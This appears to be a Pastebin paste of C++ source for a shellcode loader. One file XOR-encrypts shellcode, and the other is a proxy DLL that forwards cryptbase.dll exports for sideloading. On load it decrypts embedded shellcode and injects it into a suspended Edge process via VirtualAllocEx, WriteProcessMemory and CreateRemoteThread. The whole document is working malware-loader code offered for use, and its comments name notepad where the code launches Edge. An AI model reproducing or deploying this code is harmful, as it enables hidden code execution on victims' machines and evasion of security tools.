DLL Loader

EngEhabFahmi

Jun 17th, 2025 (edited)

310

Never

Add comment

Not a member of Pastebin yet? Sign Up, it unlocks many cool features!

C++ 9.83 KB | Software | 0 0

raw download clone embed print report

// DLL Loader
// https://www.7-zip.org/download.html
// ===============================================================
// 1st file:
#include <iostream>
#include <fstream>
#include <vector>
#include <string>
// Function to XOR encrypt the buffer using the provided key
void xorEncrypt(std::vector<unsigned char>& buf, const std::string& key) {
size_t keyLen = key.length();
for (size_t i = 0; i < buf.size(); ++i) {
buf[i] ^= key[i % keyLen];
}
}
int main(int argc, char* argv[]) {
if (argc < 4) {
std::cerr << "Usage: " << argv[0] << " <input_shellcode> <xor_key> <output_file>" << std::endl;
return 1;
}
std::string inputFile = argv[1];
std::string key = argv[2];
std::string outputFile = argv[3];
// Open input shellcode file
std::ifstream file(inputFile, std::ios::binary);
if (!file) {
std::cerr << "Error: Cannot open input file." << std::endl;
return 1;
}
// Read the file into a buffer
std::vector<unsigned char> buf((std::istreambuf_iterator<char>(file)), std::istreambuf_iterator<char>());
file.close();
if (buf.empty()) {
std::cerr << "Error: Input shellcode file is empty." << std::endl;
return 1;
}
// XOR encrypt the buffer
xorEncrypt(buf, key);
// Write XORed shellcode to output file
std::ofstream outFile(outputFile, std::ios::binary);
if (!outFile) {
std::cerr << "Error: Cannot create output file." << std::endl;
return 1;
}
outFile.write(reinterpret_cast<char*>(buf.data()), buf.size());
outFile.close();
std::cout << "[+] Shellcode encrypted and saved to: " << outputFile << std::endl;
return 0;
}
// ===============================================================
// 2nd File:
#include <stdio.h>
#include <stdlib.h>
#include <iostream>
#include <windows.h>
#include <winternl.h>
#include <thread>
#include <random>
#include "resource.h"
#define _CRT_SECURE_NO_DEPRECATE
#pragma warning (disable : 4996)
#pragma comment(linker, "/export:SystemFunction001=C:\\Windows\\System32\\cryptbase.SystemFunction001,@1")
#pragma comment(linker, "/export:SystemFunction002=C:\\Windows\\System32\\cryptbase.SystemFunction002,@2")
#pragma comment(linker, "/export:SystemFunction003=C:\\Windows\\System32\\cryptbase.SystemFunction003,@3")
#pragma comment(linker, "/export:SystemFunction004=C:\\Windows\\System32\\cryptbase.SystemFunction004,@4")
#pragma comment(linker, "/export:SystemFunction005=C:\\Windows\\System32\\cryptbase.SystemFunction005,@5")
#pragma comment(linker, "/export:SystemFunction028=C:\\Windows\\System32\\cryptbase.SystemFunction028,@6")
#pragma comment(linker, "/export:SystemFunction029=C:\\Windows\\System32\\cryptbase.SystemFunction029,@7")
#pragma comment(linker, "/export:SystemFunction034=C:\\Windows\\System32\\cryptbase.SystemFunction034,@8")
#pragma comment(linker, "/export:SystemFunction036=C:\\Windows\\System32\\cryptbase.SystemFunction036,@9")
#pragma comment(linker, "/export:SystemFunction040=C:\\Windows\\System32\\cryptbase.SystemFunction040,@10")
#pragma comment(linker, "/export:SystemFunction041=C:\\Windows\\System32\\cryptbase.SystemFunction041,@11")
const char key[] = "Uoajs2@ahiushidasd";
// Enhanced debugging function with timestamp and process ID
void DebugLog(const char* msg, LPVOID ptr = nullptr) {
SYSTEMTIME st;
GetLocalTime(&st);
printf("[%02d:%02d:%02d.%03d] [PID: %d] %s",
st.wHour, st.wMinute, st.wSecond, st.wMilliseconds,
GetCurrentProcessId(), msg);
if (ptr) {
printf(" [Pointer: 0x%p]", ptr);
}
printf("\n");
}
void PauseForDebug(const char* msg) {
DebugLog(msg);
std::cout << "Press Enter to continue...";
std::cin.ignore();
}
void HexDump(const void* data, size_t size) {
const unsigned char* p = (const unsigned char*)data;
printf("Hex dump (%zu bytes):\n", size);
for (size_t i = 0; i < size; ++i) {
printf("%02X ", p[i]);
if ((i + 1) % 16 == 0 || i == size - 1) {
printf("\n");
}
}
}
void DecryptShellcode(BYTE* data, DWORD size) {
//DebugLog("Starting shellcode decryption...");
int keyLength = sizeof(key) - 1;
//DebugLog("Shellcode before decryption:");
HexDump(data, min(size, 32)); // Show first 32 bytes
for (DWORD i = 0; i < size; i++) {
data[i] ^= key[i % keyLength];
}
//DebugLog("Shellcode after decryption:");
HexDump(data, min(size, 32)); // Show first 32 bytes
//DebugLog("Shellcode decryption completed");
}
void InjectShellcodeIntoNotepad() {
DebugLog("Starting shellcode injection process");
// Create notepad.exe process suspended
STARTUPINFO si = { sizeof(si) };
PROCESS_INFORMATION pi;
if (!CreateProcess(L"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi)) {
DebugLog("[!] Failed to create notepad process!");
return;
}
DebugLog("Notepad.exe created successfully (suspended)");
DebugLog("Notepad process information:", pi.hProcess);
printf(" Process ID: %d\n", pi.dwProcessId);
printf(" Thread ID: %d\n", pi.dwThreadId);
PauseForDebug("Notepad process created - check with Process Explorer");
HMODULE hModule = NULL;
if (!GetModuleHandleEx(GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS, (LPCTSTR)InjectShellcodeIntoNotepad, &hModule)) {
DebugLog("[!] Failed to get module handle!");
return;
}
DebugLog("Module handle obtained:", hModule);
PauseForDebug("Module handle fetched - ready to access resources");
// Find and load the resource
DebugLog("Locating resource...");
HRSRC resHandle = FindResource(hModule, MAKEINTRESOURCE(IDR_SHELL1), L"SHELL");
if (!resHandle) {
DebugLog("[!] Resource not found!");
return;
}
DebugLog("Resource found:", resHandle);
DWORD resSize = SizeofResource(hModule, resHandle);
HGLOBAL resData = LoadResource(hModule, resHandle);
void* resPtr = LockResource(resData);
if (!resPtr || resSize == 0) {
DebugLog("[!] Failed to load resource data!");
return;
}
DebugLog("Resource loaded successfully");
printf(" Resource size: %d bytes\n", resSize);
printf(" Resource pointer: 0x%p\n", resPtr);
PauseForDebug("Resource loaded - ready to process");
// Allocate memory for shellcode
BYTE* pShellcode = (BYTE*)VirtualAlloc(0, resSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if (pShellcode == NULL) {
DebugLog("[!] Memory allocation failed!");
return;
}
DebugLog("Memory allocated for shellcode:", pShellcode);
printf(" Allocation size: %d bytes\n", resSize);
PauseForDebug("Memory allocated - ready to copy shellcode");
// Copy resource data to allocated memory
memcpy(pShellcode, resPtr, resSize);
DebugLog("Shellcode copied to allocated memory");
PauseForDebug("Shellcode copied - ready to decrypt");
// Decrypt the shellcode
//DebugLog("Starting shellcode decryption...");
DecryptShellcode(pShellcode, resSize);
//PauseForDebug("Shellcode decrypted - ready to inject");
// Allocate memory in the notepad process
LPVOID pRemoteShellcode = VirtualAllocEx(pi.hProcess, NULL, resSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (!pRemoteShellcode) {
//DebugLog("[!] Failed to allocate memory in target process!");
return;
}
DebugLog("Memory allocated in Notepad process:", pRemoteShellcode);
printf(" Allocation size: %d bytes\n", resSize);
PauseForDebug("Remote memory allocated - ready to write shellcode");
// Write the decrypted shellcode into the allocated memory
SIZE_T bytesWritten = 0;
if (!WriteProcessMemory(pi.hProcess, pRemoteShellcode, pShellcode, resSize, &bytesWritten)) {
//DebugLog("[!] Failed to write shellcode to Notepad process!");
return;
}
DebugLog("Shellcode written to Notepad process");
printf(" Bytes written: %zu/%d\n", bytesWritten, resSize);
PauseForDebug("Shellcode written - ready to execute");
// Create a remote thread in the notepad process to execute the shellcode
DebugLog("Creating remote thread...");
system("pause");
HANDLE hThread = CreateRemoteThread(pi.hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)pRemoteShellcode, NULL, 0, NULL);
if (!hThread) {
//DebugLog("[!] Failed to create remote thread!");
return;
}
DebugLog("Remote thread created successfully:", hThread);
printf(" Thread ID: %d\n", GetThreadId(hThread));
PauseForDebug("Remote thread created - shellcode executing");
// Wait for the thread to complete (optional)
DebugLog("Waiting for shellcode execution to complete...");
//WaitForSingleObject(hThread, INFINITE);
DWORD exitCode = 0;
GetExitCodeThread(hThread, &exitCode);
DebugLog("Shellcode execution completed");
printf(" Exit code: 0x%08X\n", exitCode);
// Clean up
CloseHandle(hThread);
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
// Free local shellcode memory
VirtualFree(pShellcode, 0, MEM_RELEASE);
//DebugLog("Injection process completed successfully");
//PauseForDebug("EXITing....");
}
BOOL APIENTRY DllMain(HMODULE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch (ul_reason_for_call) {
case DLL_PROCESS_ATTACH: {
DebugLog("DLL attached to process");
//Sleep(12000);
InjectShellcodeIntoNotepad();
break;
}
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}

Tags: dll loader

Add Comment

Please, Sign In to add comment